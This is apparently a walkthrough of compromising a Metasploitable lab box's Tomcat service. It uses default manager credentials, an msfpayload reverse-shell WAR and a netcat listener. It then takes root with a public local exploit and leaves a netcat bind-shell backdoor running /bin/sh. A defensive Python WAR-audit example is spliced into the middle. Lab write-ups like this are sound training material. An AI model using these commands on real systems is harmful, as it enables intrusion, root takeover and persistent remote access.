In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.
Let's start with an Nmap scan…
As we can see, the Tomcat manager requires a login. I know that by default the username and password are both ‘tomcat’, so let's try that.
We have logged into the manager application! Let's now take a look at generating a reverse shell!
msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war
^^^ This will generate our .WAR file, which is the web application archive format that Apache Tomcat deploys.
Metasploit uses a random string for the name of the .jsp page inside the WAR file… To find it we can extract the WAR file before we upload it.
As we can see ktipihbvrq.jsp is our .jsp filename. The syntax to extract this file is jar -xf <WAR file name>
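Since a WAR is just a ZIP archive, the same extraction idea works from the defender's side: a reviewer can inspect a WAR uploaded through the manager (or sitting in Tomcat's webapps directory) without deploying it. The following is an added example, not part of the original video; the sample WAR, the JSP name and body, and the heuristics it applies are all constructed for illustration.

```python
import io
import re
import zipfile

# Heuristic markers: application JSPs rarely spawn processes directly.
SHELL_MARKERS = ("Runtime.getRuntime", "ProcessBuilder")
# Four or more consonants in a row is a crude "unpronounceable name" test.
CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxz]{4,}")


def build_sample_war() -> bytes:
    """Constructed sample WAR: one top-level JSP with a random-looking name
    (the name seen in the walkthrough) and no WEB-INF/web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        # Constructed placeholder body; only the API reference matters to the audit.
        zf.writestr("ktipihbvrq.jsp", "<% Runtime.getRuntime(); %>\n")
    return buf.getvalue()


def audit_war(data: bytes) -> dict:
    """List a WAR's JSP entries and return audit findings for a reviewer.

    A packaged webapp normally ships WEB-INF/web.xml, rarely consists of a lone
    top-level JSP with an unpronounceable name, and rarely calls process
    execution APIs from a JSP. Each finding is a string a reviewer can act on.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        jsps = [n for n in names if n.lower().endswith(".jsp")]
        if "WEB-INF/web.xml" not in names:
            findings.append("missing WEB-INF/web.xml")
        for name in jsps:
            base = name.rsplit("/", 1)[-1][:-4]
            if "/" not in name and CONSONANT_RUN.search(base):
                findings.append(f"random-looking top-level JSP: {name}")
            body = zf.read(name).decode("utf-8", errors="replace")
            if any(marker in body for marker in SHELL_MARKERS):
                findings.append(f"process-execution API in {name}")
    return {"jsps": jsps, "findings": findings}


if __name__ == "__main__":
    for finding in audit_war(build_sample_war())["findings"]:
        print(finding)
```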
^^^ This URL will kick off our reverse shell… Let's start up a listener…
nc -lvp 4444
^^^ Starts our netcat listener.
Let's run a tool called LinuxPrivChecker.py
So Linux Priv Checker tells us that http://www.exploit-db.com/exploits/8572/ is a good candidate to get us root. Let's try it out by following what the comments tell us to do with it…
First I will compile it. (My machine and the target are both x86 32-bit.)
So now that I have compiled the exploit with gcc 8572.c -o 8572 and uploaded it, let's pass it what was requested…
But first we need to create a run file, as the comments say. This is why it is important to read all the info before starting to play with an exploit. Comments are gold when working with someone else's code.
For this I am just going to create a simple netcat bind shell
echo “/bin/netcat -lvp 4447 -e /bin/sh” >>run
Again, this is why reading the comments is important. If you read them you see it says “usually minus 1”; in our case it was not minus 1, it worked with the exact PID.
And we have root!
As you can see, we connected from our attacking box to the new bind shell. Because this was a local root exploit, the script we created at /tmp/run was executed as root, giving us a simple netcat root backdoor on port 4447.
Hope you enjoyed the video! Send feedback to firstname.lastname@example.org